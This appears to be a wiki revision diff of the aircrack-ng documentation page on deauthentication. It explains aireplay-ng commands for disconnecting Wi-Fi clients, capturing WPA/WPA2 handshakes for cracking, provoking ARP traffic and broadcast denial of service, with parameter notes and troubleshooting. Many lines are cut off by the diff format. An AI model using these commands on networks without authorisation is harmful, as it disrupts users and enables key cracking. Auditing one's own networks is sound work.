deauthentication
Differences
This shows you the differences between two versions of the page.
Next revision | Previous revision | ||
deauthentication [2006/11/19 16:12] – darkaudax | deauthentication [2010/11/21 13:34] (current) – typos sleek | ||
---|---|---|---|
Line 1: | Line 1: | ||
====== Deauthentication ====== | ====== Deauthentication ====== | ||
- | ===== | + | ===== Description |
+ | This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. | ||
- | * Recovering a hidden | + | * Recovering a hidden ESSID. This is an ESSID which is not being broadcast. |
- | * Capturing WPA handshakes by forcing clients to reauthenticate | + | * Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate |
* Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected) | * Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected) | ||
+ | Of course, this attack is totally useless if there are no associated wireless client or on fake authentications. | ||
- | Of course, this attack is totally useless if there are no associated wireless clients.\\ | + | ===== Usage ===== |
- | It is usually more effective to target a specific station using the -c parameter. | + | |
- | ===== WPA Handshake capture with an Atheros | + | |
+ | |||
+ | Where: | ||
+ | * -0 means deauthentication | ||
+ | * 1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously | ||
+ | * -a 00: | ||
+ | * -c 00: | ||
+ | *ath0 is the interface name | ||
+ | |||
+ | ===== Usage Examples ===== | ||
+ | |||
+ | ==== Typical Deauthentication ==== | ||
+ | First, you determine a client which is currently connected. | ||
+ | |||
+ | | ||
+ | |||
+ | Where: | ||
+ | * -0 means deauthentication | ||
+ | * 1 is the number of deauths to send (you can send multiple if you wish) | ||
+ | * -a 00: | ||
+ | * -c 000: | ||
+ | * ath0 is the interface name | ||
+ | |||
+ | Here is typical output: | ||
+ | |||
+ | | ||
+ | | ||
+ | |||
+ | For directed deauthentications, | ||
+ | |||
+ | Here is what the "[ 61|63 ACKs]" means: | ||
+ | |||
+ | * [ ACKs received from the client | ACKs received from the AP ] | ||
+ | * You will notice that the number in the example above is lower then 64 which is the number of packets sent. It is not unusual to lose a few packets. | ||
+ | * How do you use this information? | ||
+ | |||
+ | |||
+ | |||
+ | ==== WPA/WPA2 Handshake capture with an Atheros ==== | ||
airmon-ng start ath0 | airmon-ng start ath0 | ||
- | airodump-ng | + | airodump-ng |
- | aireplay-ng -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0 | + | aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 |
(wait for a few seconds) | (wait for a few seconds) | ||
aircrack-ng -w / | aircrack-ng -w / | ||
- | ===== ARP request generation with a Prism2 card ===== | + | Explanation of the above: |
+ | |||
+ | airodump-ng -c 6 --bssid 00: | ||
+ | Where: | ||
+ | *-c 6 is the channel to listen on | ||
+ | *--bssid 00: | ||
+ | *-w out is the file prefix of the file name to be written | ||
+ | *ath0 is the interface name | ||
+ | |||
+ | aireplay-ng -0 5 -a 00: | ||
+ | Where: | ||
+ | *-0 means deauthentication attack | ||
+ | *5 is number of groups of deauthentication packets to send out | ||
+ | *-a 00: | ||
+ | *-c 00: | ||
+ | *ath0 is the interface name | ||
+ | |||
+ | Here is what the output looks like from " | ||
+ | |||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | | ||
+ | |||
+ | ==== ARP request generation with a Prism2 card ==== | ||
airmon-ng start wlan0 | airmon-ng start wlan0 | ||
- | airodump-ng | + | airodump-ng |
aireplay-ng -0 10 -a 00: | aireplay-ng -0 10 -a 00: | ||
aireplay-ng -3 -b 00: | aireplay-ng -3 -b 00: | ||
- | After sending the five batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client. | + | After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client. |
If the driver is [[http:// | If the driver is [[http:// | ||
- | ===== Mass denial-of-service with a RT2500 | + | ===== Usage Tips ===== |
+ | |||
+ | It is usually more effective to target a specific station using the -c parameter. | ||
+ | |||
+ | The deauthentication packets are sent directly from your PC to the clients. | ||
+ | |||
+ | |||
+ | ===== Usage Troubleshooting ===== | ||
+ | |||
+ | ===== Why does deauthentication not work? ===== | ||
+ | |||
+ | There can be several reasons and one or more can affect you: | ||
+ | |||
+ | * You are physically too far away from the client(s). | ||
+ | * Wireless cards work in particular modes such b, g, n and so on. If your card is in a different mode then the client card there is good chance that the client will not be able to correctly receive your transmission. | ||
+ | * Some clients ignore broadcast deauthentications. | ||
+ | * Clients may reconnect too fast for you to see that they had been disconnected. | ||
+ | |||
+ | |||
+ | ===== General | ||
- | airmon-ng start ra0 | + | See the general aireplay-ng troubleshooting ideas: [[aireplay-ng# |
- | | + | |
- | With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus preventing clients from staying connected. Sadly, the most up-to-date drivers and firmwares ignore deauthentications sent to broadcasts, so you need to send them directly to them using the -c option as described above. |
deauthentication.1163949138.txt.gz · Last modified: 2007/01/26 19:19 (external edit)